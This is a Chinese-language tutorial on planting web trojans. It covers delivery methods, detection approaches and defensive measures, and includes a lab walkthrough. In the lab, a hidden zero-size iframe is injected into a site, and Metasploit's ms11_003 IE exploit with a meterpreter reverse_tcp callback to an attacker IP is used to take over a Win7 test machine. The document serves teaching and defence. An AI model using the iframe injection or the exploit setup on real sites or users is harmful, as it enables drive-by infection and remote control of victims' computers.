注:本文僅供學習參考
網頁掛馬簡介
網頁掛馬指的是把一個木馬程序上傳到一個網站裏面,而後用木馬生成器生成一個網馬,放到網頁空間裏面,再加代碼使得木馬在打開網頁時運行。html
網頁掛馬工做原理
做爲網頁掛馬的散佈者,其目的是將木馬下載到用戶本地並進一步執行,當木馬獲得執行後,就意味着會有更多的木馬被下載,且進一步被執行。這樣就進入一個惡性的循環,從而使用戶的電腦遭到攻擊和控制。爲達到目的首先要將木馬下載到本地。數據庫
常見方式windows
1將木馬假裝爲頁面元素,木馬則會被瀏覽器自動下載到本地。
2利用腳本運行的漏洞下載木馬。
3利用腳本運行的漏洞釋放隱含在網頁腳本中的木馬。
4將木馬假裝成缺失的組件,或和缺失的組件捆綁在一塊兒,如flash播放插件。這樣既達到了下載的目的,下載的組件又會被瀏覽器自動執行。
5經過腳本運行調用某些com組件,利用其漏洞下載木馬。
6在渲染頁面內容的過程當中,利用格式溢出釋放木馬,如ani格式溢出漏洞。
7在渲染頁面內容的過程當中,利用格式溢出下載木馬,如flash9.0.115播放漏洞。
檢測方式瀏覽器
1特徵匹配:將網頁掛馬的腳本按腳本病毒進行檢測,可是網頁腳本變形方式、加密方式比起傳統的PE格式病毒更爲多樣,檢測起來也更加困難。
2主動防護:當瀏覽器要進行某些動做時,做出提示,以下載了某插件的安裝包,會提示是否運行。好比瀏覽器建立暴風影音播放器時,提示是否容許運行,大多數狀況下用戶會點擊是,網頁木馬會所以獲得執行。
3檢查父進程是否爲瀏覽器,這種方法很容易被躲過且會對不少插件形成誤報。
網站掛馬實驗
準備win7實驗機和kali
kali ip地址爲10.1.1.101
1.將如下代碼插進咱們準備的網站中服務器
<iframe src=地址 width=0 height=0></iframe>
將寬度高度都設爲0,這個地址就會變成透明,不查看源代碼的話是發現不了的
這裏的網馬地址設置爲http://10.1.1.101:8060/test.html當用戶訪問到咱們這個地址時,會自動訪問http://10.1.1.101:8060/test.html,木馬會被瀏覽下載到本地微信
2.利用ms11_003IE漏洞攻擊win7主機
執行命令app
use exploit/windows/browser/ ms11_003_ie_css_import’,選擇漏洞利用EXP
設置SRVPORT URIPATH與網馬中的src一致
set SRVPORT 8060
set URIPATH test.html
運行命令set payload windows/meterpreter/reverse_tcp 設置攻擊載荷進行回連
set lhost 10.1.1.101 設置回連的IP地址
set lport 1234設置回連端口號
show options
最後設置完看下圖
執行run命令
好戲上場
這時打開win7實驗機,打開IE,模擬受害者訪問http://10.1.1.101/index.htmltcp
在kali端成功看到受害者主機上線學習
成功使用sysinfo查看主機信息
使用Screenshot查看win7實驗機的屏幕截圖(win7待機了)
包括後面收集信息屬於後滲透環節,本文不作討論。
防護措施
1對開放上傳附件功能的網站,必定要進行身份認證,並只容許信任的人使用上傳程序。
2保證所使用的程序及時地更新。
3不要在前臺網頁加註後臺管理程序登陸頁面的連接。
4時常備份數據庫等文件,可是不要把備份數據放在程序默認的備份目錄下。
5管理員的用戶名和密碼要有必定複雜性。
6 IIS中禁止目錄的寫入和執行功能,能夠有效防止asp木馬。
7在服務器、虛擬主機控制面板設置執行權限選項中,將有上傳權限的目錄取消asp的運行權限。
8建立一個robots.txt上傳到網站根目錄,Robots可以有效防範利用搜索引擎竊取信息的駭客。